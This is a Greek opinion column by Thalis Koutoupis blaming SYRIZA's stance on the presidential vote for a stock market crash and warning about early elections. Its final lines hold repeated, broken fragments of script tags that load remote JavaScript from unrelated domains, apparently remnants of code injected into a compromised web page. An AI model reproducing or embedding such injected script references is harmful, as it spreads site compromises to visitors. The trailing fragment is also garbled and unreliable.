Προανάκρουσμα καταστροφής!! Του Θαλή Κουτούπη

0046

Είχα γράψει πώς και μόνη η προκήρυξη πρόωρων εκλογών -ανεξαρτήτως αποτελεσμάτων- θα προκαλούσε τεράστια -έως καταστροφική- αντίδραση των αγορών.

Δικαιώθηκα, πριν αλέκτορα φωνήσαι! Ήδη χθες με την απλή πιθανότητα εκλογών -αν η Βουλή δεν εκλέξει Πρόεδρο Δημοκρατίας- το Χρηματιστήριο έκανε ιστορικό αρνητικό ρεκόρ με πτώση 13% και τα spreads πήραν την ανηφόρα, σαφές προανάκρουσμα του τι πρόκειται να ακολουθήσει, αν και όταν προκηρυχθούν εκλογές!

Κι αυτό για ένα απλούστατο λόγο: αντί ο ΣΥΡΙΖΑ, ως μία εναλλακτική κυβερνητική λύση, να εμπνεύσει ελπίδα, έχει διασπείρει τον φόβο, τόσο στο εσωτερικό όσο και στο εξωτερικό!

Τον δρόμο προς τις πιθανές εκλογές δεν τον χάραξε βέβαια η Κυβέρνηση, αλλά ο αντισυνταγματικός, αντιδημοκρατικός και ιταμός εκβιασμός του ΣΥΡΙΖΑ και των λοιπών “δημοκρατικών” δυνάμεων, με τη δήλωσή τους πως “όποιος κι αν είναι ο υποψήφιος, εμείς δεν θα τον ψηφίσουμε”.

Την ίδια συνταγή άλλωστε είχε ακολουθήσει κι ο Γιώργος Παπανδρέου.

Στην πραγματική ΠΑΤΡΙΩΤΙΚΗ συνείδηση των βουλευτών εναπόκειται η λύση!

Δείτε όλα τα άρθρα του Θαλή Κουτούπη εδώ___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’> challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >